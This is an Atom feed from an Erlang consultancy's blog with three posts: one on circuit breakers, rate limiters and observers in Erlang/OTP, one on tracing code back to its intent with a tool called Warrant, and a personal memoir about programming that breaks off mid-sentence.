<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet href="/blog/feed.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom">


  <title>HappiHacking Blog</title>
  <subtitle>Helpful Hieroglyphics</subtitle>
  <link href="https://happihacking.com/blog/feed.xml" rel="self"/>
  <link href="https://happihacking.com"/>
  <updated>2026-03-29T00:00:00Z</updated>
  <id>https://happihacking.com</id>
  <author>
    <name>Happi Hacking AB</name>
    <email>info@happihacking.com</email>
  </author>
  
  <entry>
    <title>The Shared State of Isolation</title>
    <link href="https://happihacking.com/blog/posts/2026/the-erlang-isolation-trap/"/>
    <updated>2026-03-29T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2026/the-erlang-isolation-trap/</id>
    <summary>Why Systems Collapse Under Load (and How to Fix It)</summary>
    <content type="html">&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gatekeeper_4.png&quot; alt=&quot;The Gatekeeper Gnome&quot; title=&quot;The Gatekeeper Gnome&quot; /&gt;&lt;/p&gt;
&lt;p&gt;A recent essay,
&lt;a href=&quot;https://causality.blog/essays/the-isolation-trap/&quot;&gt;&amp;quot;The Isolation Trap&amp;quot;&lt;/a&gt;,
argues that Erlang&#39;s isolation model has structural limits: deadlocks
from circular calls, unbounded mailboxes, and escape hatches like ETS.
The &lt;a href=&quot;https://news.ycombinator.com/item?id=47347920&quot;&gt;HN discussion&lt;/a&gt;
added production experience:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;All the problems I&#39;ve had with Erlang have been related to full
mailboxes or having one process type handling too many kinds of
different messages.&amp;quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The critique has merit. Circular &lt;code&gt;gen_server:call&lt;/code&gt; chains can deadlock
(strict &lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;archetypes&lt;/a&gt; prevent this
by directing calls one way, down the supervision tree). The production
failures worth solving are more specific.&lt;/p&gt;
&lt;p&gt;In &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;The Gnome Village&lt;/a&gt; I wrote:
&amp;quot;Isolation contains damage. Sharing spreads it.&amp;quot; That holds for crashes.
Isolation does nothing about slowness. When hundreds of processes hit
the same degraded API, they fail independently and simultaneously. Each
gnome is an island. Islands that share a coastline flood together when the tide comes in.&lt;/p&gt;
&lt;p&gt;Three things break:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Correlated timeouts.&lt;/strong&gt; A slow dependency causes hundreds of
processes to time out at once.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Retry amplification.&lt;/strong&gt; Each timeout spawns a retry, multiplying
load on an already degraded system.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mailbox flooding.&lt;/strong&gt; Processes accumulate messages faster than they
drain them.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When the storm hits, even isolated islands flood, and the illusion of perfect isolation shatters.&lt;/p&gt;
&lt;h2 id=&quot;three-gatekeepers&quot; tabindex=&quot;-1&quot;&gt;Three Gatekeepers&lt;/h2&gt;
&lt;p&gt;Consider a standard payment system under heavy load. To survive the flood, it needs a Gatekeeper at each failure point. Gatekeepers sit at domain boundaries where unbounded input meets bounded capacity. (See &lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;Process Archetypes&lt;/a&gt; for the full role taxonomy.)&lt;/p&gt;
&lt;p&gt;You can&#39;t stop the tide, but you can decide where the water is allowed to flow.&lt;/p&gt;
&lt;p&gt;A circuit breaker sits in front of the fraud API. When the dependency turns unreliable, the breaker trips after three consecutive failures, closes the gate, and starts exponential backoff. Callers get a fast, clear &lt;code&gt;{error, breaker_blocked}&lt;/code&gt; instead of another cascading timeout.&lt;/p&gt;
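&lt;p&gt;A minimal sketch of the breaker&#39;s request path as a &lt;code&gt;gen_server&lt;/code&gt;, assuming a three-failure threshold; &lt;code&gt;call_dependency/1&lt;/code&gt;, &lt;code&gt;try_half_open/1&lt;/code&gt;, and &lt;code&gt;trip/1&lt;/code&gt; are illustrative placeholders, not the exact code behind this post:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;%% Illustrative sketch, not a complete module.
handle_call({request, Req}, _From, #state{status = open, retry_at = T} = S) -&gt;
    case erlang:monotonic_time(millisecond) &gt;= T of
        true  -&gt; {reply, try_half_open(Req), S#state{status = half_open}};
        false -&gt; {reply, {error, breaker_blocked}, S}  % fail fast, no timeout
    end;
handle_call({request, Req}, _From, #state{failures = F} = S) -&gt;
    case call_dependency(Req) of
        {ok, Result} -&gt;
            {reply, {ok, Result}, S#state{failures = 0}};
        {error, _} when F + 1 &gt;= 3 -&gt;
            %% Third consecutive failure: close the gate and start backoff.
            {reply, {error, breaker_blocked}, trip(S)};
        {error, Reason} -&gt;
            {reply, {error, Reason}, S#state{failures = F + 1}}
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The important property is the first clause: while the gate is closed, callers are answered immediately from the breaker&#39;s own state, so no request ever waits on the degraded dependency.&lt;/p&gt;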
&lt;p&gt;A rate limiter on the worker pool uses a token bucket to cap concurrent requests, keeping the inflow below what the system can drain. When tokens are exhausted, callers immediately receive &lt;code&gt;{error, rate_limited}&lt;/code&gt;, avoiding queue buildup and unbounded memory growth.&lt;/p&gt;
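&lt;p&gt;The token bucket fits the same &lt;code&gt;gen_server&lt;/code&gt; shape; this sketch assumes a once-per-second refill timer, with capacity and rate held in illustrative state fields:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;%% Illustrative sketch of a token-bucket limiter.
handle_call(acquire, _From, #state{tokens = 0} = S) -&gt;
    {reply, {error, rate_limited}, S};  % bucket empty: refuse instead of queueing
handle_call(acquire, _From, #state{tokens = N} = S) -&gt;
    {reply, ok, S#state{tokens = N - 1}};
handle_info(refill, #state{tokens = N, cap = Cap, rate = R} = S) -&gt;
    erlang:send_after(1000, self(), refill),
    {noreply, S#state{tokens = min(Cap, N + R)}}.
&lt;/code&gt;&lt;/pre&gt;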
&lt;p&gt;A sentinel (&lt;a href=&quot;https://happihacking.com/blog/posts/2025/observers/&quot;&gt;Observer&lt;/a&gt;) watches the water level. It monitors the worker group, and when failure rates cross a threshold, it alerts the payment coordinator to switch to a fallback path before the system collapses.&lt;/p&gt;
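&lt;p&gt;The sentinel needs little more than monitors and a counter. In this sketch, &lt;code&gt;failure_rate/1&lt;/code&gt;, &lt;code&gt;threshold/0&lt;/code&gt;, and the coordinator call are hypothetical stand-ins for the alerting logic:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;%% Illustrative sketch: observe the workers, never own their work.
init(Workers) -&gt;
    [erlang:monitor(process, W) || W &lt;- Workers],
    {ok, #state{failures = 0}}.

handle_info({&#39;DOWN&#39;, _Ref, process, _Pid, _Reason}, #state{failures = F} = S0) -&gt;
    S = S0#state{failures = F + 1},
    case failure_rate(S) &gt; threshold() of
        true  -&gt; payment_coordinator:use_fallback(),
                 {noreply, S#state{failures = 0}};
        false -&gt; {noreply, S}
    end.
&lt;/code&gt;&lt;/pre&gt;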
&lt;p&gt;None of these patterns require shared mutable state. They use OTP primitives that already exist: gen_server state machines, supervisor restart budgets, and process monitors.&lt;/p&gt;
&lt;h2 id=&quot;the-serialization-objection&quot; tabindex=&quot;-1&quot;&gt;The Serialization Objection&lt;/h2&gt;
&lt;p&gt;The essay claims that when a process mailbox becomes a bottleneck, teams invariably reach for ETS, reintroducing the shared state that isolation was supposed to prevent.&lt;/p&gt;
&lt;p&gt;But mailbox bottlenecks usually signal role confusion, not an inherent flaw in message passing. A &lt;a href=&quot;https://happihacking.com/blog/posts/2025/resource_owners/&quot;&gt;Resource Owner&lt;/a&gt; that only holds state and answers questions can handle messages in microseconds. It serves thousands of &lt;a href=&quot;https://happihacking.com/blog/posts/2025/workers/&quot;&gt;Workers&lt;/a&gt; without a backlog.&lt;/p&gt;
&lt;p&gt;It is only when that same process also calls databases, formats responses, and logs metrics that it backs up. Split those roles, and the serialized path stays fast. If demand still exceeds capacity, a Gatekeeper bounds the load long before anyone needs to reach for ETS.&lt;/p&gt;
&lt;p&gt;ETS, &lt;code&gt;persistent_term&lt;/code&gt;, and &lt;code&gt;atomics&lt;/code&gt; certainly have legitimate uses. A counter for metrics collection is a controlled, pragmatic relaxation of the model. As one HN commenter put it:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;Message passing is a way of constraining shared memory to the point where it&#39;s possible for humans to reason about most of the time.&amp;quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;full-circle&quot; tabindex=&quot;-1&quot;&gt;Full Circle&lt;/h2&gt;
&lt;p&gt;When a well-designed system faces the same traffic spike, the outcome changes. The system stays responsive, and the failure remains local instead of spreading.&lt;/p&gt;
&lt;p&gt;If you are building systems that handle money, or any other critical load, follow these three rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Put a &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gatekeepers/&quot;&gt;circuit breaker&lt;/a&gt; in front of
every external dependency.&lt;/li&gt;
&lt;li&gt;Limit concurrency on every worker pool that calls external services.&lt;/li&gt;
&lt;li&gt;Define &lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;backpressure contracts&lt;/a&gt;
at every domain boundary.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Isolation gives you crash containment for free, but nothing is truly isolated. To survive slowness and load, you need a good architecture and solid building blocks. That is exactly what domains, flows, and process archetypes provide.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/GoldenGate.JPG&quot; alt=&quot;Golden Gate Bridge&quot; title=&quot;Bridges between isolated islands&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Under the Golden Gate, the water moves fast because the channel is narrow. Systems behave the same way. Constrain the flow, and you get predictable movement. Remove the constraint, and the same water spreads out, slows down, and piles up elsewhere.&lt;/p&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://causality.blog/essays/the-isolation-trap/&quot;&gt;&amp;quot;The Isolation Trap&amp;quot;&lt;/a&gt; by zapwalrus (causality.blog). The essay this post responds to.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://news.ycombinator.com/item?id=47347920&quot;&gt;HN discussion&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;series-gnomes-domains-and-flows&quot; tabindex=&quot;-1&quot;&gt;Series: Gnomes, Domains, and Flows&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;The Gnome Village&lt;/a&gt; — processes, isolation, scheduling&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/supervisors-are-managers/&quot;&gt;Supervisors Are Managers&lt;/a&gt; — restart strategies, supervision trees&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt; — processes + domains + flows&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and Data&lt;/a&gt; — domain boundaries, failure domain grouping&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work Moving&lt;/a&gt; — backpressure contracts, four flow types&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/&quot;&gt;Putting It Together&lt;/a&gt; — payments walkthrough&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;series-process-archetypes&quot; tabindex=&quot;-1&quot;&gt;Series: Process Archetypes&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;Process Archetypes&lt;/a&gt; — the five roles&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/workers/&quot;&gt;Workers&lt;/a&gt; — one job, pools, fan-out&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/resource_owners/&quot;&gt;Resource Owners&lt;/a&gt; — entity owners, aggregators&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/routers/&quot;&gt;Routers&lt;/a&gt; — direction, no flow control&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/gatekeepers/&quot;&gt;Gatekeepers&lt;/a&gt; — circuit breakers, rate limiters, flow controllers&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/observers/&quot;&gt;Observers&lt;/a&gt; — sentinels, supervisors&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For a deeper look at how the BEAM implements processes, heaps, message
passing, scheduling, and garbage collection, see
&lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Your Code Has No Memory</title>
    <link href="https://happihacking.com/blog/posts/2026/your-code-has-no-memory/"/>
    <updated>2026-03-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2026/your-code-has-no-memory/</id>
    <summary>From code change to intent, there and back again</summary>
    <content type="html">&lt;p&gt;Many teams can answer what a piece of code does. Far fewer can explain why it exists, what constraint shaped it, which tradeoff led to it, and whether that reasoning still holds. That gap matters more now because we produce and change code at a pace where the loss of shared understanding is easy to miss until something important breaks.&lt;/p&gt;
&lt;h2 id=&quot;source-code-has-no-memory&quot; tabindex=&quot;-1&quot;&gt;Source code has no memory&lt;/h2&gt;
&lt;p&gt;We store source code, commits, pull requests, tickets, and documents, and over time the connections between them stop holding because they are not captured in a way that survives normal development. Branches disappear, tickets move between systems, pull requests capture moments of discussion, and months later the code remains while the reasoning has dissolved into fragments.&lt;/p&gt;
&lt;p&gt;This is why a system can look healthy in the metrics we watch and still feel risky to change, since the tests pass, the linter is happy, the modules are named sensibly, and yet no one wants to touch the part that matters because the team no longer remembers which constraints were deliberate and which behaviors are accidental.&lt;/p&gt;
&lt;p&gt;Margaret-Anne Storey describes this well in &lt;a href=&quot;https://arxiv.org/abs/2603.22106&quot;&gt;a recent paper&lt;/a&gt; and &lt;a href=&quot;https://www.linkedin.com/posts/margaret-anne-storey_we-have-many-tools-to-measure-the-quality-share-7442442974422036480-zQ0H/&quot;&gt;a related post&lt;/a&gt;, noting that we have many tools to measure code quality and very few ways to tell whether a team still understands the system or remembers why it was built that way. That framing is useful because it gives a name to something many teams experience without quite being able to describe it.&lt;/p&gt;
&lt;h2 id=&quot;it-is-not-just-technical-debt&quot; tabindex=&quot;-1&quot;&gt;It is not just technical debt&lt;/h2&gt;
&lt;p&gt;Technical debt still matters, since shortcuts accumulate interest and poor structure slows future work, though it only describes the state of the code and says much less about the state of understanding or the availability of the rationale that should guide change.&lt;/p&gt;
&lt;p&gt;Storey&#39;s terms help here: cognitive debt is the erosion of shared understanding, and intent debt is the absence of explicit rationale, goals, and constraints. The distinction matters because a codebase can be tidy and still be expensive to change when the team no longer shares a reliable model of how it works or what it is trying to preserve.&lt;/p&gt;
&lt;p&gt;That is the failure mode I see most often. Messy code is visible; the deeper issue is that the theory of the system becomes unevenly distributed and the reasons behind earlier decisions were never captured in a form later developers can trust. Every change then starts with reconstruction, and reconstruction is slow, error-prone, and rarely visible on a sprint board.&lt;/p&gt;
&lt;p&gt;I see the same pattern in agentic development, where an agent can get stuck changing code back and forth, or move in a circle of revisions, because it does not understand why the code changed the last time. When the reason for a change is missing, the agent can still produce plausible edits, but it has no reliable way to tell whether it is preserving an intended constraint or undoing it by accident.&lt;/p&gt;
&lt;h2 id=&quot;we-try-to-fix-it-with-process&quot; tabindex=&quot;-1&quot;&gt;We try to fix it with process&lt;/h2&gt;
&lt;p&gt;Most teams have mechanisms that look like solutions, with tickets, commits, pull requests, and internal docs, and while all of these can help, they rarely preserve why a specific change exists in a durable way.&lt;/p&gt;
&lt;p&gt;The link between these artifacts and the code is weak and optional, so tickets drift away, commit messages compress context, pull requests optimize for approval rather than rationale, and traceability turns into archaeology where the story can be reconstructed only with time and the right people.&lt;/p&gt;
&lt;p&gt;That is not a workable model.&lt;/p&gt;
&lt;h2 id=&quot;there-is-a-real-debate-here&quot; tabindex=&quot;-1&quot;&gt;There is a real debate here&lt;/h2&gt;
&lt;p&gt;There is a real debate here, since some argue that documenting intent costs more than it gives back, especially when documentation becomes stale, and prefer to rely on code and tests while making changes based on present needs.&lt;/p&gt;
&lt;p&gt;That criticism lands because much documentation is performative, with large documents that stop matching reality and create the appearance of control without helping decisions, and if that is the alternative then skepticism makes sense.&lt;/p&gt;
&lt;p&gt;The useful middle ground is to capture rationale when it becomes concrete, since a short decision record, a task file with intent and constraints, or a merge-time summary tied to the change carries more value than large upfront documentation that quickly diverges.&lt;/p&gt;
&lt;h2 id=&quot;this-is-starting-to-matter&quot; tabindex=&quot;-1&quot;&gt;This is starting to matter&lt;/h2&gt;
&lt;p&gt;This matters more now because AI-assisted development increases output faster than understanding can be built. Manual work forces the cognitive effort that builds a model of the system; generated implementations still require that understanding, and they often leave the team with less of it than the output suggests.&lt;/p&gt;
&lt;p&gt;The risk shifts from code quality alone to understanding and rationale, where teams can ship for a while and the cost shows up later during maintenance, onboarding, incidents, or audits.&lt;/p&gt;
&lt;p&gt;This is especially visible in regulated environments, where you must explain what changed, who approved it, and why it was done, often for a specific change, and while teams can produce that answer, they do it by searching across systems because rationale is treated as residue instead of part of the change.&lt;/p&gt;
&lt;h2 id=&quot;what-is-missing&quot; tabindex=&quot;-1&quot;&gt;What is missing&lt;/h2&gt;
&lt;p&gt;What is missing is a property of the system itself: a codebase should let you move from a line of code to the change that introduced it, to the unit of work that authorized it, and to the intent that made it reasonable at the time.&lt;/p&gt;
&lt;p&gt;At a minimum, the chain looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;code
  &amp;lt;- commit
    &amp;lt;- task
      &amp;lt;- intent
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Teams need a stable route from implementation back to reason; without it, every important question starts from scratch.&lt;/p&gt;
&lt;p&gt;That applies equally to teams and AI agents: both need to travel from code change back to intent.&lt;/p&gt;
&lt;h2 id=&quot;a-minimal-model&quot; tabindex=&quot;-1&quot;&gt;A minimal model&lt;/h2&gt;
&lt;p&gt;The model can stay small: each change carries a task identifier and a short statement of intent, branches and commits carry that identifier, tasks live close to the repository, and important decisions are captured in short ADR-style records. Tools can then reconstruct the trace without relying on memory.&lt;/p&gt;
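&lt;p&gt;Concretely, and only as an illustration (the identifiers and file layout below are made up, not Warrant&#39;s exact format), the conventions can be this small:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;branch:  task/T-142-retry-budget
commit:  T-142: cap retries per request, not per call site

# .warrant/tasks/T-142.md (hypothetical task record)
id:       T-142
intent:   Stop retry storms against the fraud API during degradation.
decision: Budget retries per request; recorded as a short ADR.
&lt;/code&gt;&lt;/pre&gt;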
&lt;p&gt;The format matters less than timing and discipline, since the reason needs to be captured while it is still available and in a form that survives time, which is why short decision records written at the moment of choice remain practical.&lt;/p&gt;
&lt;p&gt;Shared understanding should be treated as a deliverable, since teams already allocate time for code and tests because those artifacts matter later, and rationale deserves the same treatment in a lighter form because future work depends on it in the same way.&lt;/p&gt;
&lt;h2 id=&quot;in-practice&quot; tabindex=&quot;-1&quot;&gt;In practice&lt;/h2&gt;
&lt;p&gt;In practice this needs to live close to the code, so when reading a file the question becomes whether the code can lead you back to the task, the intent, and the decision that shaped it, which separates traceability as paperwork from traceability as a working property.&lt;/p&gt;
&lt;figure&gt;
  &lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/warrant-vscode-screen.png&quot; alt=&quot;Warrant VS Code extension showing the current task sidebar, inline blame annotations, and a trace panel for the selected task&quot; /&gt;
  &lt;figcaption&gt;The editor view stays close to the real traceability chain, because the sidebar shows the current task and task list, the inline annotations tie visible lines to task-linked commits, and the trace panel brings task intent, linked artifacts, and audit history into one place.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;In Warrant, the VS Code extension follows simple conventions, reading task records from &lt;code&gt;.warrant/tasks/&lt;/code&gt;, inferring the current task from the branch, and using &lt;code&gt;git blame&lt;/code&gt; with task-linked commits to annotate lines, so the editor can show task context, intent, and history because the repository contains enough structured intent to reconstruct the story.&lt;/p&gt;
&lt;h2 id=&quot;one-important-constraint&quot; tabindex=&quot;-1&quot;&gt;One important constraint&lt;/h2&gt;
&lt;p&gt;The repository needs to remain the source of truth, so tasks, intent, and decisions travel with the code and cloning the repository gives both the system and the context needed to understand it, while external systems can still add value without being the only place where rationale lives.&lt;/p&gt;
&lt;h2 id=&quot;a-separate-concern-proof&quot; tabindex=&quot;-1&quot;&gt;A separate concern: proof&lt;/h2&gt;
&lt;p&gt;Some environments need independent proof that a change followed an approved path, and in those cases a separate service can observe commits and merges and record an append-only account, allowing the repository to hold the work while the external system acts as a witness.&lt;/p&gt;
&lt;p&gt;This avoids the trap where compliance systems own the work, since if the repository owns the work and the external service records events then you get evidence without moving the source of truth.&lt;/p&gt;
&lt;p&gt;This is the space I have been working on with Warrant, where each change carries a small task record with an ID, intent, and decision, and when it reaches &lt;code&gt;main&lt;/code&gt; the merge can be tied back to that task and optionally recorded in an append-only ledger.&lt;/p&gt;
&lt;p&gt;That reduces the failure mode where rationale disappears after the pull request is closed. The tool itself is narrow and Git-native, and the point is the same as in the editor view above: preserve the why while the team still knows it.&lt;/p&gt;
&lt;h2 id=&quot;what-this-changes&quot; tabindex=&quot;-1&quot;&gt;What this changes&lt;/h2&gt;
&lt;p&gt;The practical effect is small but noticeable: debugging starts from intent instead of guesswork, audits become closer to queries, onboarding improves because reasoning is visible, and AI-generated code becomes easier to place inside a controlled workflow because constraints and decisions are explicit.&lt;/p&gt;
&lt;p&gt;More importantly, it means that when you come back to a piece of code and ask the question from the beginning, why does this exist, you are less likely to start from guesswork. Software systems need memory outside human recollection, since code stores behavior and Git stores change history while teams still need a durable way to store the reasons that connect one to the other. Without that, understanding erodes quietly and the system becomes harder to explain, evolve, and trust.&lt;/p&gt;
&lt;h2 id=&quot;if-you-want-to-try-it&quot; tabindex=&quot;-1&quot;&gt;If you want to try it&lt;/h2&gt;
&lt;p&gt;If you want to try it, start with a few conventions: task IDs in branches and commits, short intent records next to the code, and lightweight ADRs for decisions with lasting consequences. Consistency matters more than tooling. If the chain from code to change to intent exists reliably, the system starts to retain memory instead of depending on whoever still remembers the story.&lt;/p&gt;
&lt;p&gt;If you&#39;re interested, you can find the current implementation in &lt;a href=&quot;https://github.com/happi/warrant&quot;&gt;the Warrant repository&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The Late-Night Feeling of Wonder</title>
    <link href="https://happihacking.com/blog/posts/2026/the-late-night-feeling-of-wonder/"/>
    <updated>2026-03-16T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2026/the-late-night-feeling-of-wonder/</id>
    <content type="html">
&lt;p&gt;In 1980 my sister, ten years older than me, started university and brought home a
TI-58 programmable calculator. I was ten years old. I found out you could
give it instructions and it would follow them. That was enough. I was done
for.&lt;/p&gt;
&lt;p&gt;Within a year I had convinced my parents to buy a VIC-20. I learned BASIC,
then 6502 assembler, because BASIC was too slow for what I wanted to do.
On an 8-bit machine the assembler is close enough to touch. You see exactly
what the CPU does, every register, every cycle. Then came the Commodore 64.&lt;/p&gt;
&lt;h2 id=&quot;the-c64-years&quot; tabindex=&quot;-1&quot;&gt;The C64 years&lt;/h2&gt;
&lt;p&gt;The C64 was the real playground. I would sit down at ten in the evening
thinking &amp;quot;I will just get this one thing working.&amp;quot; In Haparanda, in
northern Sweden, winter darkness arrives at three in the afternoon and
stays until nine the next morning. The screen was the only light in the
room. The world shrank to the keyboard and the monitor, and hours
disappeared. At three in the morning I would look up and realize school
started in five hours. It was not work or homework. I was still there
because I wanted to see what more the machine could do.&lt;/p&gt;
&lt;p&gt;I got pixels on the screen and learned to move them. I got sounds out of
the SID chip. I built text adventures, entire worlds made of words and
conditional logic. I started writing my own version of M.U.L.E., then my
own version of Elite. Neither was ever finished. Neither needed to be. At
some point I built a turtle robot, two wheels and a pen that could move
up and down, controlled from the C64. It drew circles on paper. Code that
reached into the physical world and left marks on it.&lt;/p&gt;
&lt;p&gt;Each project raised the stakes: calculator to screen to sound to worlds
to physical robots. I would discover a new capability and immediately
try to build five things with it. Most of them never got finished. The
joy was in the discovery that the machine would do what you told it to do.&lt;/p&gt;
&lt;h2 id=&quot;from-c64-to-compilers&quot; tabindex=&quot;-1&quot;&gt;From C64 to compilers&lt;/h2&gt;
&lt;p&gt;University extended the same feeling into deeper territory. At Uppsala I
studied computer science and later wrote a PhD on native code compilation
for Erlang. After that came a postdoc at EPFL, working on compiler design
and the early days of Scala. The loop was the same. Here is a machine. How
far can you push it?&lt;/p&gt;
&lt;p&gt;The academic years kept the discovery loop alive. You could spend months
on a single optimization pass, trying approaches that might not work,
measuring the results, trying again. The feedback was slower than the C64
sessions, measured in benchmark runs rather than pixels on a screen. The
underlying drive was the same: find out what the machine can do, then make
it do more.&lt;/p&gt;
&lt;p&gt;Some nights ended in a working optimization. Some nights ended in Unreal
Tournament.&lt;/p&gt;
&lt;h2 id=&quot;the-long-middle&quot; tabindex=&quot;-1&quot;&gt;The long middle&lt;/h2&gt;
&lt;p&gt;Then programming became my profession in a different sense. Over twenty
years I built systems for banks, telecom companies, and startups. Erlang,
distributed systems, the kind of software where reliability is not
optional. I learned the craft of building things that serve real users
under real constraints: architecture reviews, test coverage, deployment
pipelines, incident response. The discipline of engineering.&lt;/p&gt;
&lt;p&gt;The all-night sessions stopped. You do not stay up until three when you
have production systems to keep running and people depending on your
judgment the next morning. The joy got channeled into something more
measured and more useful.&lt;/p&gt;
&lt;p&gt;The late nights that remained were incidents. A live bug in a runtime
system, logs streaming, dashboards lighting up, people asking for updates.
Solving those problems can be satisfying. It is a different kind of
adrenaline. But it is not the same as staying up because a sprite finally
moved across the screen.&lt;/p&gt;
&lt;h2 id=&quot;the-old-blogs-knew&quot; tabindex=&quot;-1&quot;&gt;The old blogs knew&lt;/h2&gt;
&lt;p&gt;There is an interesting pattern if you read the old blogs from
&lt;a href=&quot;https://steve-yegge.blogspot.com/2006/03/execution-in-kingdom-of-nouns.html&quot;&gt;Steve Yegge&lt;/a&gt;,
&lt;a href=&quot;https://blog.codinghorror.com/the-first-rule-of-programming-its-always-your-fault/&quot;&gt;Jeff Atwood&lt;/a&gt;,
and &lt;a href=&quot;https://www.joelonsoftware.com/2001/02/12/human-task-switches-considered-harmful/&quot;&gt;Joel Spolsky&lt;/a&gt;
today. They were writing about why programming used to feel joyful, and
many of the things they described are suddenly becoming true again.&lt;/p&gt;
&lt;p&gt;In the early days the barrier between idea and code was small. A programmer
had a REPL, a compiler, a text editor, and curiosity. Yegge wrote huge
systems in scripting languages because it was fun. Joel built startups with
tiny teams. Atwood wrote Stack Overflow partly as a side project experiment.
You wrote code because you wanted to see what would happen.&lt;/p&gt;
&lt;p&gt;Then enterprise software happened. Frameworks on top of frameworks,
dependency graphs with thousands of packages, build pipelines that take
longer than a coffee break. You stopped writing programs and started
operating infrastructure. Yegge ranted about it. Atwood joked about it.
Joel turned it into business advice.&lt;/p&gt;
&lt;p&gt;If you step back, there is a strange cycle. The 1980s and 1990s: fast
feedback, experimentation, joy. The enterprise era, roughly 2000 to 2020:
heavy frameworks, process, infrastructure. The AI-assisted era, 2023
onward: fast feedback again. Joel wrote during phase two, often pointing
at the friction. In essays like &amp;quot;The Law of Leaky Abstractions,&amp;quot; &amp;quot;Things
You Should Never Do,&amp;quot; and &amp;quot;The Joel Test,&amp;quot; he kept returning to the same
principles: fast feedback loops, simple tools, programmers working in flow,
minimal friction between idea and running code. He never wrote about vibe
coding. He described the conditions that make it work.&lt;/p&gt;
&lt;h2 id=&quot;the-repl-is-back&quot; tabindex=&quot;-1&quot;&gt;The REPL is back&lt;/h2&gt;
&lt;p&gt;The cycle time between idea and running code is collapsing again. LLM
coding assistants, interactive notebooks, fast local tooling. The friction
Joel spent years complaining about is shrinking, and that is the real
reason people talk about vibe coding. It is not about laziness. It is
about latency, and latency kills creativity.&lt;/p&gt;
&lt;p&gt;Yegge made an observation years ago that still holds: great programmers
build systems that amplify curiosity, not systems that enforce process.
Languages like Lisp, Python, Erlang, and Smalltalk always had this
property. You can poke a running Erlang system, change it while it lives,
explore it. AI tools unintentionally recreate the same kind of environment.
Not perfectly. Enough to bring back the feeling of discovery.&lt;/p&gt;
&lt;p&gt;Joel once wrote that great programmers are dramatically more productive
than average ones. AI tools may end up amplifying exactly that effect. The
people who already loved exploring systems late at night will simply
explore much faster.&lt;/p&gt;
&lt;h2 id=&quot;the-return&quot; tabindex=&quot;-1&quot;&gt;The return&lt;/h2&gt;
&lt;p&gt;It came back in stages. In late 2022 I started a Java project by asking
ChatGPT questions and copying the answers into my editor. Clumsy, slow,
and still faster than writing boilerplate from scratch. By mid-2023 I
was doing the same with Erlang world generation code and ML model tuning.
The loop was: ask, copy, paste, fix, repeat.&lt;/p&gt;
&lt;p&gt;In 2024, Copilot moved into my editor and the loop tightened. I started
a life organizer in January, a productivity server in February with a
